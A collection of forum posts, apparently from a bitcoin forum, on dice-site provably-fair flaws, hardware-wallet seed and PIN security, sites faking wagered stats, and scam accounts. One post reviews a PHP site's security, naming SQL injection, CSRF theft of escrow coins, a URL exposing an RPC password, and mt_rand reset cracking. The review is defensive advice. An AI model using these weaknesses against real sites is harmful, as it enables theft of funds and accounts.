I guess like that yeh, but I was still thinking on the "seed + keylogger risk" - it wouldn't help for that.

I never looked at them and only had a quick look now:



Hi/Lo freebitco.in game
First of all the house edge is 5%. There is nothing wrong with that, but most sites have a 0.5 - 1% house edge (and SatoshiDice highest with 1.95%.) Since they do give away free money and lottery entries, again I don't think there is anything wrong with it. But a "real dice player" probably should play somewhere else.

Provably fair
They use a "nonce" but yet they change the serverseed after each roll. So I am not sure why they would use that nonce With the "per roll" provably fair implementation, it's important that the site regenerates an unique client seed in the browser after getting the new serverseed hash after each bet. freebitco.in doesn't do this. This means IMO the provably fair implementation of them is "not really" provably fair.

Basically it allows them to serve a serverseed based on bet patterns (if you always go high, they would generate a low result.) The counter argument is that they shouldn't do this, because if they do this - you as a player can heavily cheat them too (bet 10x high, then a big low bet = easy profits.) Of course they could do it more subtle/smart. But besides that, the least they can do is make a result that isn't 8888 (jackpot), to scam jackpot entries completely unnoticeable.

I don't think they do this, but they should still fix this. Rollin had the same and fixed it: https://bitcointalk.org/index.php?topic=687571.msg12122724#msg12122724 You can see more details/fix there too.

Note, that you CAN still bet provably fair on their site. It just takes some time: 1) Click "provably fair" 2) write down "Hash" and "Nonce" 3) change the "Client seed" 4) make bet 5) verify bet (their link seems fine.) You will need to do this for EVERY bet.



Lottery
Lottery is not provably fair at all. So yeh, "house player" can always win everything. If they want to implement a provably fair lottery, they should look into how PevPot used to do it.




TL;DR: personally I would gamble on other sites with proper provably fair implementations (preferably with real nonce-implementation.)

I think BitSler still doesn't show any wagered statistic, so I cannot add them to my site.

Yeh, even with 10 number PIN it would take a few minutes max, so I guess that's completely useless (again the device adds big exponentially increasing delay upon every failed PIN, so works fine for that.)

Yeh, seed + keylogger is probably the biggest risk. I think PIN would be somewhat easy to brute-force if it were 25th word (compared to passphrase), but too lazy to do the math. I can still see it could be an advantage for advanced users though (since keylogger is less effective in that situation.)





Anyway, on a different subject, can anyone from SatoshiLabs tell me if an Android version of the TREZOR Password Manager is planned? I love the idea of using Trezor as password manager and would actually encourage others to use it even if they don't have any bitcoins. But Android version seems necessary for me personally. Even if it isn't as advanced as LastPass (easily fills in password in other apps etc), just a simple list + way to get password in Android app would do for now.

Yes. Seed = private key. PIN only protects for not getting into the device (and does a good job on that, because every invalid PIN adds a serious delay.)

You should add a passphrase though which functions as 25th word. This should be pretty long (let's say 8+ characters), otherwise it could be easily brute-forced with the seed. However, if you forget your passphrase, the funds are gone.

Basically it's much more important to keep your backup seed safe than the device.

This is incorrect.

From the PHP documentation:

You can also very easily test this yourself. Just echo both session_id() and $_COOKIE["PHPSESSID"]. You can see that the cookie value will be echo-ed even with ' or " in it, however the session_id will be empty. But if you change the cookie with only aZ09-, it will be also returned with the session_id function.

Probably

TBH your whole code looks like a lot of security risks. I thought about making a proper list of vulnerabilities, but this would require a lot of time from me (since your site does look complex) and the bounties look a bit "uncertain". So I am not sure if I want to put like a few days of time into it TBH.



Just in general you REALLY should adjust this:

* NEVER ever use the "quote()" shit for protection of SQL injection. Use prepared statements (lookup PDO->prepare()) instead.
* Use CSRF protection probably just ALWAYS whenever there is user input. I am pretty sure I can steal the escrow coins by sending the escrow an URL that loads an iframe/post-form/etc to send the coins to me. This requires user interaction (escrow has to open an URL), but can be pretty easy/doable.
* IMO you shouldn't strip_tags before putting it in the DB. Just always sanitize the output to the user. A template system can help with this, some will HTML encode every variable by default.
* Best to make most scripts NOT public for visitors to access. Basically you should only have .htaccess + bootstrapper (index.php) in your public_html together with CSS/JS/images. All PHP should be outside of it and just loaded by index. In your situation, you could at least hide the cron/classes/includes/libs/scripts. For example I can get your RPC password here: http://empirecoin.org/scripts/getinfo.php That is probably some test file which you forgot to delete (and I assume the bitcoind is not running at the moment), but could be serious problem.
* Just in general your code would be much easier to read (= easier to see bugs) if it's divided into MVC structure.
* Functions like rand() and mt_rand() are not cryptographically secure. It is possible to hack accounts on your site by using the "reset password" function and cracking mt_rand. Search for random_bytes() - I believe that is cryptographically secure in PHP lately.

All of those things, are generally taken care of by a PHP framework. That is why using a PHP framework is pretty great. I really like Laravel lately. But converting your site to a PHP framework might take serious time.



On the positive side: it seems to have a lot of features and I can always appreciate open-source work.



I am pretty sure session_id() verifies any session ID from cookie etc? I don't think you can get values with " with that. OP should still use prepared statements though.

Like a year ago, lol. No, but next month should be realistic

The FortuneJack faking stats "discussion" started here: "Are the wagered stats of 14+ million BTC on the homepage correct?", they denied having wrong stats a couple times, so I gave a bit more arguments in this post. Finally they acknowledged it was wrong and claimed it was because of some exchange rate bug and offered me a bug bounty in PM (probably to keep me quite - I refused.) I gave some more arguments on why the wrong stats couldn't be caused by an exchange rate bug. They basically just ignored it from there. Few days later they did lower their stats by 28 times but still basically ignored my arguments.

I know FortuneJack however does have some real players who deposit/withdraw without any problem, so I don't make a huge deal out of it. But it is obviously pretty sketchy and I won't ever list them on my site because of it (impossible for me to trust their stats after that.)

Thanks. I do plan to add several other sites when I finished the new version of my site. Unfortunately that is taking pretty long lol, but it will come eventually.

True.

To be honest anyone who ever been on a dice site can just go to https://www.betbtc.co/casino/dice and look at the bet list themselves. All those 100% random amounts and chances.. LOL! That should really show enough for anyone who knows the basics of dice (people betting default 2x option, strategies with same payout, strategies with increasing amounts - martingale, etc.)

Yes. There should be a "Gambling discussions" subforum. Both the "Tipsters" and the "Discussion" threads are very low quality (mostly signature and ref spam.) There are "discussions" with thousands of replies on the question "is gambling profitable"... it's just insane really.

I actually made an user script that allows you to "Ignore threads" just because of the insane spam in the Gambling forum (script here: https://bitcointalk.org/index.php?topic=1451483.0) The subforum idea has come up many times, see also this topic from 1 year ago with more arguments: https://bitcointalk.org/index.php?topic=1162790.0;all Right now my Gambling forum looks like this (just see how many are "discussions/tipster" topics):



If the Gambling forum would be only topics with sites (who put effort into making a good website etc), I think the quality would be much better. In the end bitcointalk is still the center of the bitcoin gambling community, but the Gambling forum itself is very disappointing. A simple "Gambling discussion" forum would help. The rule could be simple, no paid domain with real website = in subforum.

Obviously those new accounts 6102rekcahxfb, hackrekcahxfb, etc. are scammers as well. Can't believe that the troll-hacker actually got 0.46 from it... why would anyone send anything to that address :s Even the original troll said on Slack/Reddit on his confirmed other accounts that he was hacked..

Anyway, leaving this reply so I can use it as reference for new negative trust for those new accounts.


No. That signed message is from original "bfxhacker" and therefor useless. Blockchain.info screenshot is either just edited HTML but maybe even just "watch address" function. Totally useless.

That new address will be empty. And he will say he is the real "bfxhacker" (which isn't true) and you need to send funds to that new address of his.

Obvious scam is obvious.

Some losses for investors tonight. Player "norightturnplease" won BTC210: https://i.imgur.com/iTU40ay.png



Players can win (big) too, so there is no guaranteed winnings. In the long-term you should get a profit of course though. You can look at the graphs here: https://dicesites.com/betking to see how the total profit progresses and what your expected profit is based on wagered amounts.

Player "norightturnplease": 40 bets, BTC640 wagered, BTC210 profit. Easy game

No, I won't support your site in any way. Problem is that you are obviously faking stats. My site is all about statistics and doesn't make any stupid subjective ratings, but rather lists sites based on wagered stats as "popularity indicator". When sites like FortuneJack and now you, are faking stats, I see that as serious sketchy behavior. I won't list sites that do shit like that.



Not sure. Begin June someone posted that most BTC of Dicenow are from a hack. Owner didn't reply, but did change the OP 5 days later saying "Dicenow.com is shutting down at the end of June. Please divest and withdraw all coins ASAP.". So either way, looks like they are gone.

Generally when a site/owner becomes inactive it is a red flag. Ice Dice, Win88, Dicenow, Diggit (was offline for months, no reply from owner), Coinichiwa (owner gone for 6 months now), etc. Always risky to leave coins on a site with inactive owner.




The maximum profit a player can win per bet, changes after each bet. This should be around 0.5-1% of the bankroll (or the "virtual bankroll" if margin-funding is allowed.) This way the player should never be able to win "all" the money based on the Kelly criterion theory.

Left negative trust for now.

Very strange plot twist.

TBH if he signs messages from 1BfxSux... addy again, I might remove negative trust. In the end if people want to join this very risky "lottery", that is their own choice. But those 3 "changes" do seem really strange indeed.





edit: TBH I really think he used some throwaway password and got hacked.

Yesterday in Slack he was saying things like above.. which seems like pretty good English to me. But now he talks like this:
Really? Nah.


Also on Slack:

His e-mail on slack is: ethereumdefense@yandex.com

So the plot thickens.. Is this hacker an Ethereum Maximalist trying to destroy Bitcoin?

Let me guess, next thing the Ethereum Maximalists are going to hard fork Bitcoin with all hacks/thieves addresses blacklisted and pump all their ETH into BBTC (Bailout-Bitcoin) to pump the price and hurt the Bitcoin price?! Damn Ethereum Maximalists.

Like most BTC sites they use Cloudflare (which is between you and the actual PD server.) So you are pinging Cloudflare, not their server.